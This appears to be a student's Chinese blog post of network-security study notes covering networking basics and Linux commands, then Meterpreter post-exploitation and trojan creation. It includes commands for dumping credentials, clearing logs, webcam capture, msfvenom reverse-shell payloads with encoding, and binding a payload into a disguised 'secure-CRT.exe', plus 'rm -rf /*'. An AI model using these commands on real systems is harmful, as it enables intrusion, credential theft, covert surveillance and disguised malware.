首页 > 其他分享 >网络安全笔记

网络安全笔记

时间:2024-06-22 17:29:15浏览次数:23  
标签:网络安全 exe windows ip binding 笔记 地址 root

1,网络
设备 链路
设备:网络设备(对外提供网络服务)   终端设备(使用网络服务)
路由器 交换机 防火墙      pc机,服务器
osi参考模型
开放系统互联的参考模型
iso:国际标准化组织
1.物理层:传输bit
2.数据链层
3.网络层
4.传输层
5.会话层
6.表示层
7.应用层
1-3 用户运用 4-7数据传输
物理层:提供传输bit的介质,定义数据传输方式
bit位 Byte字节 B=8b
1.双绞线(网线),抗干扰
 1五类线 100Mb/S,超五类,六类:1000Mb/S
 T568A:绿白,绿,橙白,蓝,蓝白,橙,棕白,棕

 T568B:橙白,橙,绿白,蓝,蓝白,绿,棕白,棕
2.信号传输方式
(1)单工模式:一方发送数据,另一方接受数据(空调,遥控器)
(2)半双工模式:在同一模式内,一方发送数据,另一方接受数据(对讲机)
 (3)全双工模式:双方可以同时发送和接受数据
2.数据链层(将数据变成数据帧传送到对端):物理编址,mac地址,总长48bit,12位十六进制数表示,mac地址全球唯一,终身不可变
前24bit表示oui(厂商),后24bit厂商自定义
每个网卡都有一个mac地址,ipcanfig/all
传输的是数据帧
DNS:域名解析
将域名解析成ip地址
需要依赖dns服务器工作的
公用dns:114.114.114.114
*****ping:表示探测的目标是否可达
    reply from:从目标收到回复
   request time out:超时,数据包发送,对方不回复
   Unreachable:可达,数据包不可以发送到终端
CDN(旁站)
3.网络层:1.提供逻辑编制(ip地址), 总成32bit,每8bit转换成十进制,中间用“”.“”来连接(点分十进制)
ip地址根据首字节判断类别
A:1-126 B128-191 C192-223 D224-239 E:240-255
127被保留,作为本地环回地址使用,用于测试本地地址网卡驱动程序是否正常工作
*****tracert:探测目标的路径

TTL:Time to live,数据包每经过一台设备,TTL就会-1,window的ttl初始默认为64
子网掩码
vmware1:仅主机模式,则只可以访问宿主机,不可以访问外部网络
vmware8:nat模式,当虚拟机网卡调整vmnet8后,可以借助宿主机网络访问外部网络
操作系统
wondows:适合新手,更面向个人用户 缺陷:1蓝屏,2不可以长时间待机
linux:开源且稳定;
Mac OS:苹果

shell(人机交互的接口)
 1GUI(图形化界面)
 2CLI(命令行接口):用这个人多
──(root㉿kali)-[~]
└─# 
root:用户名
k:分隔符无意义
kali:主机名
后面工作路径
基础命令:
1.whoami:查看用户名
2.pwd:打印工作路径
3.切换用户:
在linux有且只有两种用户
(1):普通用户
(2):超级管理员:root,尽量避免root来操作系统 (rm -rf /*删除所有)
su - 用户名(完全)
su 用户名(只是命令)
root 切其他直接 ,其他切换到root要密码
不要频繁使用su -不断产生子资源,占用资源
**history:之前所有命令
  exit:退出子进程
  ctrl+d :退出当前的shell对话
cd命令(change directory):切换更改路径
windows系统目录以盘开头
linux 系统目录以/开头
wireshark:一款网络工具,抓捕数据表
永恒之蓝:shell进入对方cmd
cmd: md 创造文件夹
net user 名字 /add :创造新用户del删除
获取密码:load kiwi     creds_all 2.hashdump(密文)
clearev:清空日志
screenshot:截图 screenshare视频看 webcam_stream webcam_snap
shutdown -a:取消 -r:重启 -s:关机
netstat -n:查看其他与自己电脑连接的ip
chcp 65001:消除乱码
上传 upload /目录 C://
下载 download c://名字 /目录
run post/manage/enable_rdp username=123 password 123
木马生成及其利用:
1关闭杀软
2在kali终端里用msf生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.113.128 -f exe -o text.exe
-p 指定payload类型,此处指定windows/meterpreterreverse_tcp
-f format 指的是输出格式类型
-o 输出木马文件名,此处payload.exe

  2  监听
use. exploit/multi/handler
pwd
ls
cat+文件名可以查看文件内容 
edit 编辑
del 删除
run post/windows/manage/migrate 躲避杀软
atp  install -y golang
binding权限
ls -s内容及其属性
chmod +x bindbing
./binding 查看binding使用方法
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.113.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
./binding msf.exe secure-CRT.exe secure-CRT.ico

标签:网络安全,exe,windows,ip,binding,笔记,地址,root
From: https://blog.csdn.net/2302_78974996/article/details/139885348

相关文章

  • C++学习笔记----重载运算符
    运算符重载运算符重载可以在通过成员函数或者全局函数进行重载,编译器提供了内置的运算符;我们可以通过定义对应的函数和参数进行重载,也可以使用编译器提供的名称`operator运算符()`进行重载;运算符重载本质是对内置的运算符函数进行重载:函数相同,参数不同;返回引用和地址需要思......
  • JAVA学习笔记DAY10——SpringBoot基础
    文章目录SpringBoot3介绍SpringBoot快速入门@SpringBootApplicationSpringBoot配置文件统一配置管理Yaml配置优势tipsSpringBoot整合SpringMVC静态资源拦截器interceptorSpringBoot整合DruidSpringBoot整合MybatisSpringBoot整合txaopSpringBoot打包......
  • 2024.06.22【读书笔记】丨生物信息学与功能基因组学(第十七章 人类基因组 第一部分)【AI
    第一部分:人类基因组概述与测序历史(详细版)摘要:第十七章深入探讨了人类基因组的复杂性、测序历程以及其对现代科学的意义。人类基因组由约30,000至40,000个蛋白质编码基因组成,这些基因的表达和变异构成了我们生物学特征和疾病倾向的基础。本章节详细回顾了人类基因组计划的......
  • Manacher学习笔记
    1.用途给定一个串,求该串中最长回文子串的长度2.算法过程2.1.预处理回文串分为两类,奇回文和偶回文,所以对称中点是不确定的,可能是字符也可能是两个字符之间的空隙所以可以在任意两个字符和开头结尾加上同一个奇怪的字符,此时的回文中心就一定是一个字符2.2.算法主体定义数......
  • 【抽代复习笔记】21-群(十五):循环群引理及定义
    例4:证明,如果σ=(i1i2…ik)是Sn中的一个k-循环,而r∈Sn,则rσr^(-1)也是一个k-循环,且rσr^(-1)=(r(i1),r(i2),…,r(ik))。证:①设σ=(i1i2…ik)=(i1ik)(i1ik-1)…(i1i2),则rσr^(-1)=r(i1i2…ik)r^(-1)=r(i1ik)(i1ik-1)…(i1i2)r^(-1)=r(i1ik)[r^(-1)r](i1ik-1)[......
  • 树的序列化笔记
    \(dfs\)序以\(DFS\)(先根遍历)⾸次访问顺序将节点重新排列。特征:每个顶点在序列中出现恰好⼀次(废话)⽗节点排在⼦节点前⾯(废话)每棵⼦树都占据序列的⼀个区间欧拉序记录\(DFS\)递归/回溯时依次经过的所有点。特征:每个点出现次数=度数(根多1次)相邻点深度差1\(LCA(x,y)=\)......
  • Hive笔记-4
    240618-Hive笔记-44.2Insert4.2.1将查询结果插入表中1)语法INSERT (INTO |OVERWRITE)TABLE tablename[PARTITION (partcol1=val1,partcol2=val2...)]select_stamement;关键字说明:(1)INTO:将结果追加到目标表(2)OVERWRITE:用结果覆盖原有数据2)案例......
  • Linux驱动开发笔记(九)IIC子系统及其驱动
    文章目录前言一、IIC驱动框架二、总线驱动2.1iic总线的运行机制2.2重要数据结构2.2.1i2c_driver结构体2.2.2i2c总线结构体2.3匹配规则三、设备树的修改四、设备驱动的编写4.1相关API函数4.1.1i2c_add_adapter()4.1.2i2c_register_driver()4.1.3i2c_transfer......
  • Effective C++ 改善程序与设计的55个具体做法笔记与心得 4
    四.设计与声明18.让接口容易被正确使用,不易被误用请记住:好的接口很容易被正确使用,不容易被误用。你应该在你的所有接口中努力达成这些性质“促进正确使用”的办法包括接口的一致性,以及与内置类型的行为兼容。“阻止误用”的办法包括建立新类型、限制类型上的操作、束缚......
  • FFmpeg开发笔记(三十一)使用RTMP Streamer开启APP直播推流
    ​RTMPStreamer是一个安卓手机端的开源RTMP直播推流框架,可用于RTMP直播和RTSP直播,其升级版还支持SRT直播(腾讯视频云就采用SRT协议)。RTMPStreamer支持的视频编码包括H264、H265、AV1等等,支持的音频编码包括AAC、G711、OPUS等等,可谓功能强大的APP直播框架。由于升级版的RTMPStre......